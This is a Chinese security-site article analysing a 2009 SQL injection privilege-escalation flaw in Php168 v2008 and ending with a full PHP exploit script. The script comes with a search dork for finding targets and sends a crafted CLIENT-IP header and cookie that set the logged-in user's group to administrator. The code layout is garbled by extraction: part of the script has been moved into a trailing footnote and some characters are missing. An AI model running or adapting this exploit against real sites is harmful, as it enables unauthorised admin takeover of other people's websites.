首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

Php168 v2008 提升权限漏洞


http://www.gipsky.com/
by Ryat

http://www.wolvez.org

2009-01-25

简单分析下这个漏洞



PHP代码

<OL class=dp-c>

<LI class=alt>common.inc.php

<LI class="">

<LI class=alt>if($_SERVER['HTTP_CLIENT_IP']){

<LI class=""> $onlineip=$_SERVER['HTTP_CLIENT_IP'];

<LI class=alt>}elseif($_SERVER['HTTP_X_FORWARDED_FOR']){

<LI class=""> $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR'];

<LI class=alt>}else{

<LI class=""> $onlineip=$_SERVER['REMOTE_ADDR'];

<LI class=alt>}

<LI class="">$onlineip = preg_replace("/^([\d\.] ).*/", "\\1", filtrate($onlineip));

<LI class=alt>//这个地方使用preg_replace存在着安全隐患,之前就暴过漏洞,官方修补的方法是用filtrate函数处理了下$onlineip </OL>

看一下filtrate函数是怎么处理的



PHP代码

<OL class=dp-c>

<LI class=alt>function.inc.php

<LI class="">

<LI class=alt>function filtrate($msg){

<LI class=""> $msg = str_replace('&','&',$msg);

<LI class=alt> $msg = str_replace(' ',' ',$msg);

<LI class=""> $msg = str_replace('"','"',$msg);

<LI class=alt> $msg = str_replace("'",''',$msg);

<LI class=""> $msg = str_replace("<","<",$msg);

<LI class=alt> $msg = str_replace(">",">",$msg);

<LI class=""> $msg = str_replace("\t"," ",$msg);

<LI class=alt> $msg = str_replace("\r","",$msg);

<LI class=""> $msg = str_replace(" "," ",$msg);

<LI class=alt> return $msg;

<LI class="">} </OL>

过滤了'"<等,但是没有处理\



PHP代码

<OL class=dp-c>

<LI class=alt>common.inc.php

<LI class="">

<LI class=alt> if($usr_oltime>30||!$usr_oltime){

<LI class=""> $usr_oltime>600 && $usr_oltime=600;

<LI class=alt> include(PHP168_PATH."php168/level.php");

<LI class=""> if( isset($memberlevel[$lfjdb[groupid]]) ){

<LI class=alt> $SQL=",groupid=8";

<LI class=""> $lfjdb[money]=get_money($lfjuid);

<LI class=alt> foreach( $memberlevel AS $key=>$value){

<LI class=""> if($lfjdb[money]>=$value){

<LI class=alt> $SQL=",groupid=$key";

<LI class=""> }

<LI class=alt> }

<LI class=""> }else{

<LI class=alt> $SQL="";

<LI class=""> }

<LI class=alt> $db->query("UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='$onlineip',oltime=oltime '$usr_oltime'$SQL WHERE uid='$lfjuid'");

<LI class="">//因为这个地方是拼接字符串的形式,所以可以使用\来转义',然后利用$usr_oltime来注射:) </OL>

另外要注意的是$usr_oltime有一个简单的判断的,而且还要保证sql语句的语法正确,看下我构造的语句:



PHP代码

<OL class=dp-c>

<LI class=alt>UPDATE {$pre}memberdata SET lastvist='$timestamp',lastip='[\]',oltime=oltime '[ 31,groupid=3,introduce=0x70757265745f74 WHERE uid=2#]'$SQL WHERE uid='$lfjuid' </OL>

最后给个EXP:



PHP代码

<OL class=dp-c>

<LI class=alt>#!/usr/bin/php

<LI class=""><?php

<LI class=alt>

<LI class="">print_r('

<LI class=alt> ---------------------------------------------------------------------------

<LI class="">Php168 <= v2008 update user access exploit

<LI class=alt>by puret_t

<LI class="">mail: puretot at gmail dot com

<LI class=alt>team: http://www.wolvez.org

<LI class="">dork: "Powered by PHP168"

<LI class=alt> ---------------------------------------------------------------------------

<LI class="">');

<LI class=alt>/**

<LI class=""> * works regardless of php.ini settings

<LI class=alt> */

<LI class="">if ($argc < 5) {

<LI class=alt> print_r('

<LI class=""> ---------------------------------------------------------------------------

<LI class=alt>Usage: php '.$argv[0].' host path user pass

<LI class="">host: target server (ip/hostname)

<LI class=alt>path: path to php168

<LI class="">user: login username

<LI class=alt>pass: login password

<LI class="">Example:

<LI class=alt>php '.$argv[0].' localhost /php168/

<LI class=""> ---------------------------------------------------------------------------

<LI class=alt>');

<LI class=""> exit;

<LI class=alt>}

<LI class="">

<LI class=alt>error_reporting(7);

<LI class="">ini_set('max_execution_time', 0);

<LI class=alt>

<LI class="">$host = $argv[1];

<LI class=alt>$path = $argv[2];

<LI class="">$user = $argv[3];

<LI class=alt>$pass = $argv[4];

<LI class="">

<LI class=alt>$resp = send();

<LI class="">preg_match('/Set-Cookie:\s(passport=([0-9]{1,4}) [a-zA-Z0-9%] )/', $resp, $cookie);

<LI class=alt>

<LI class="">if ($cookie)

<LI class=alt> if (strpos(send(), 'puret_t') !== false)

<LI class=""> exit("Expoilt Success!\nYou Are Admin Now!\n");

<LI class=alt> else

<LI class=""> exit("Exploit Failed!\n");

<LI class=alt>else

<LI class=""> exit("Exploit Failed!\n");

<LI class=alt>

<LI class="">function rands($length = 8)

<LI class=alt>{

<LI class=""> $hash = '';

<LI class=alt> $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';

<LI class=""> $max = strlen($chars) - 1;

<LI class=alt> mt_srand[1]

<LI class=alt> $resp .= fread($fp, 1024);

<LI class="">

<LI class=alt> return $resp;

<LI class="">}

<LI class=alt>

<LI class="">?> </OL>
附注
  1. double)microtime() * 1000000);

    <LI class=""> for ($i = 0; $i < $length; $i )

    <LI class=alt> $hash .= $chars[mt_rand(0, $max)];

    <LI class="">

    <LI class=alt> return $hash;

    <LI class="">}

    <LI class=alt>

    <LI class="">function send()

    <LI class=alt>{

    <LI class=""> global $host, $path, $user, $pass, $cookie;

    <LI class=alt>

    <LI class=""> if ($cookie) {

    <LI class=alt> $cookie[1] .= ';USR='.rands()."\t+31,groupid=3,introduce=0x70757265745f74 WHERE uid=$cookie[2]#\t\t";

    <LI class=""> $cmd = '';

    <LI class=alt>

    <LI class=""> $message = "POST ".$path."member/userinfo.php HTTP/1.1\r\n";

    <LI class=alt> $message .= "Accept: */*\r\n";

    <LI class=""> $message .= "Accept-Language: zh-cn\r\n";

    <LI class=alt> $message .= "Content-Type: application/x-www-form-urlencoded\r\n";

    <LI class=""> $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

    <LI class=alt> $message .= "CLIENT-IP: ryat\\\r\n";

    <LI class=""> $message .= "Host: $host\r\n";

    <LI class=alt> $message .= "Content-Length: ".strlen($cmd)."\r\n";

    <LI class=""> $message .= "Connection: Close\r\n";

    <LI class=alt> $message .= "Cookie: ".$cookie[1]."\r\n\r\n";

    <LI class=""> $message .= $cmd;

    <LI class=alt> } else {

    <LI class=""> $cmd = "username=$user&password=$pass&step=2";

    <LI class=alt>

    <LI class=""> $message = "POST ".$path."login.php HTTP/1.1\r\n";

    <LI class=alt> $message .= "Accept: */*\r\n";

    <LI class=""> $message .= "Accept-Language: zh-cn\r\n";

    <LI class=alt> $message .= "Content-Type: application/x-www-form-urlencoded\r\n";

    <LI class=""> $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

    <LI class=alt> $message .= "Host: $host\r\n";

    <LI class=""> $message .= "Content-Length: ".strlen($cmd)."\r\n";

    <LI class=alt> $message .= "Connection: Close\r\n\r\n";

    <LI class=""> $message .= $cmd;

    <LI class=alt> }

    <LI class="">

    <LI class=alt> $fp = fsockopen($host, 80);

    <LI class=""> fputs($fp, $message);

    <LI class=alt>

    <LI class=""> $resp = '';

    <LI class=alt>

    <LI class=""> while ($fp && !feof($fp
<< 传播淫秽视频14人获刑 春节期间重大网络安全回顾 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号